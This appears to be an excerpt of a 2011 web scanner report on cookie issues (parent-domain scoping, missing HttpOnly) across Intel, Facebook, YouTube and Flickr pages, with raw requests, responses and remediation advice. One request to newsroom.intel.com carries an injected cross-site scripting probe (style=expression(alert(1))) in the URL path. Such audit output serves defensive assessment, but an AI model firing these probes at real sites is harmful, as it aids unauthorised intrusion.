GET /p/simplemodal/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/swfobject/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /details?v=i73f0pQBfQ8 HTTP/1.1 Host: m.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=PvG3c; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Intel HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=PvG3c; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:21:09 GMT Content-Length: 43972
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sharer.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=nQPs-; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:21:08 GMT Content-Length: 10821
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /apps/slideshow/show.swf HTTP/1.1 Host: www.flickr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:18 GMT P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Set-Cookie: BX=916edod6krmju&b=3&s=qs; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com Last-Modified: Mon, 21 Jun 2010 23:36:27 GMT Accept-Ranges: bytes Content-Length: 118333 X-Served-By: www144.flickr.mud.yahoo.com Cache-Control: private Connection: close Content-Type: application/x-shockwave-flash
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /photos/intelphotos HTTP/1.1 Host: www.flickr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:17 GMT P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Set-Cookie: BX=6dgtddl6krmjt&b=3&s=ve; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com Set-Cookie: localization=en-us%3Bus%3Bus; expires=Tue, 04-Feb-2014 23:17:17 GMT; path=/; domain=.flickr.com Set-Cookie: cookie_l10n=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com Set-Cookie: cookie_intl=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com X-Served-By: www40.flickr.mud.yahoo.com Cache-Control: private Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65286
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /channelintel HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
Response
HTTP/1.1 303 See Other Date: Sat, 05 Feb 2011 23:32:31 GMT Server: Apache X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: GEO=748e55c21ab77f5c42666c7de4cddc97cwsAAAAzVVOtwdbzTU3eDw==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Content-Length: 0 Cache-Control: no-cache Location: http://www.youtube.com/das_captcha?next=/channelintel Content-Type: text/html; charset=utf-8 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /view_play_list HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
Response
HTTP/1.1 303 See Other Date: Sat, 05 Feb 2011 23:32:33 GMT Server: Apache X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: GEO=a0eadf3d397495f055b487c9dbb220f2cwsAAAAzVVOtwdbzTU3eEQ==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Content-Length: 0 Cache-Control: no-cache Location: http://www.youtube.com/?ytsession=EDIPaPJ1NkCikKaHvniF7Tiz6vDWTKiQ2BjrzENMdu4p9NPioHcNGMGtxIJnyKsQ9R2I0ZskMRuPWAvsogbKJyMWdeu6E20vtaVqZVDrw7r_emQa58TecjXkS424salJlpG18NSZg1fKaRHRopstmT9udEtftazAtuYX5ENoz6ASKAmuR9gwuzmdsPgCvpW_exCnDvIgodEvClzCDA0RQe5zB9i1kM0ugB-9Pp7XUtYHjj1xXNi4E_xDKRXczWIf1KogmWn98Y7QdIm3PseAUQ Content-Type: text/html; charset=utf-8 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /watch HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
Response
HTTP/1.1 303 See Other Date: Sat, 05 Feb 2011 23:32:33 GMT Server: wiseguy/0.6.7 Content-Length: 0 X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: PREF=f1=40000000; path=/; domain=.youtube.com; expires=Tue, 02-Feb-2021 23:32:33 GMT Set-Cookie: GEO=1a33cb5129beba695e57998bcff5bd59cwsAAAAzR0KtwdbzTU3eEQ==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fwww.youtube.com%2Fwatch&ytsession=Uq4q39XF8n9pzVE7ljERwFoh2ir4kQlnCvFfi3V86wjgkCxlmb9pqK47ZeV_AeK8Gwi_mmTUJO6EE5ehEUFOiUOwnmac1YQ8wbPkBQA-K857ZGPA4gaFu591L_HP6SJNE6Hh7IwMMjOi6R-9ReRkQSMrxmsRjs1L7joKvo52BVGDZGuL-TQEmNaQhm9iYfu8CAZG9xN5aPSB4nCO3yweeBbU07vD6c26v_7TT7mnV8W0gTeCsoe37SpcCsl47vCTo9g2wt0u8Ri5yPMrqyNc2B7GXI0DyN3Ayh3nXEwYcOfb9eUQHoN_bQ Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|26A7000A05012477-60000107200B4F69[CE]; Expires=Fri, 5 Feb 2016 01:57:40 GMT; Domain=.intel.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: appdeveloper.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 23:17:40 GMT Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=99d10be2a8b5824058095ee73c009e9e; expires=Tue, 01-Mar-2011 02:51:00 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 05 Feb 2011 23:17:40 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Set-Cookie: loginpt=0 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml HTTP/1.1 Host: appdeveloper.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 23:17:40 GMT Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=222cb97a2603f1b3e7ce4b3ecc102334; expires=Tue, 01-Mar-2011 02:51:00 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 05 Feb 2011 23:17:40 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Set-Cookie: loginpt=0 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /community/openportit/server HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /community/openportit/vproexpert HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /community/tech HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /community/tech/desktop HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.jspa HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jquery/scrollTo/ HTTP/1.1 Host: flesler.demos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:59:27 GMT Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack) Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Status: 404 Not Found Cache-Control: no-cache Content-Length: 947 Set-Cookie: _display_manager_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7AA%253D%253D--af8c11ce1971d13ddb232e31aa849f4ac245c1dc; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* RESET STYLES (see http://meyerweb.com/eric/tools/css/reset/) */ /* * * this is not a straight copy/paste from the above URL. this has been * custom modified by us. so don't go copy/paste u ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* overrides for elements while customizing a page */ body.jive-body-widget-customizing #jive-body #jive-body-intro, body.jive-body-widget-customizing #jive-body #jive-breadcrumb, body.jive-body-wi ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: newsroom.intel.com
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 01:56:20 GMT Server: Apache Set-Cookie: JSESSIONID=0F9AA48CBC22DD7A7D0A421E6737E14C.node7IPR; Domain=.intel.com; Path=/ Set-Cookie: jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; Version=1; Path=/ X-JAL: 17 Content-Language: en-US CacheHit: D=26624 t=1296957380484009 X-JSL: D=26628 t=1296957380484009 Cache-Control: no-cache Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /engine/icorescript.asp?s=15&sid=&c=&geo=0&f=NONE HTTP/1.1 Host: onsite2.researchintel.com Proxy-Connection: keep-alive Referer: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:12:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" cache-control: private pragma: no-cache Content-Length: 187 Content-Type: text/html Expires: Thu, 03 Feb 2011 23:12:18 GMT Set-Cookie: ASPSESSIONIDCSTRSASQ=DJKDPHKCHBEKBKLBIMAIHJGD; path=/ Cache-control: No-Store
The following cookie was issued by the application and does not have the HttpOnly flag set:
SESSabdcf03bfc020aa07e9f024d8c52c72f=tcttbhd60i0t3is8770gbmmcb0; expires=Tue, 01 Mar 2011 02:54:53 GMT; path=/; domain=.plugins.jquery.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /project/SimpleModal HTTP/1.1 Host: plugins.jquery.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:21:33 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Set-Cookie: SESSabdcf03bfc020aa07e9f024d8c52c72f=tcttbhd60i0t3is8770gbmmcb0; expires=Tue, 01 Mar 2011 02:54:53 GMT; path=/; domain=.plugins.jquery.com Last-Modified: Sat, 05 Feb 2011 23:21:32 GMT ETag: "a21bd565ad8681eec5d18d0535ad0a09" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18067
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cs_login HTTP/1.1 Host: secure-newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/articles/intel-cloud-builders-overview/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/01/31/everyone-has-a-dream/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/01/31/everyone-has-a-dream/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Language: en-us X-Pingback: http://software.intel.com/en-us/services/comment/pingback/ Date: Sat, 05 Feb 2011 23:21:40 GMT Content-Length: 20519 Connection: close Set-Cookie: PHPSESSID=a638f3cc0588735e2cef74d00d31654d; path=/; domain=intel.com Set-Cookie: loginpt=0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <head profile="http: ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sites/academic_showcase/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
guest_id=129694815451621917; path=/; expires=Mon, 07 Mar 2011 23:22:34 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /EricMMartin HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
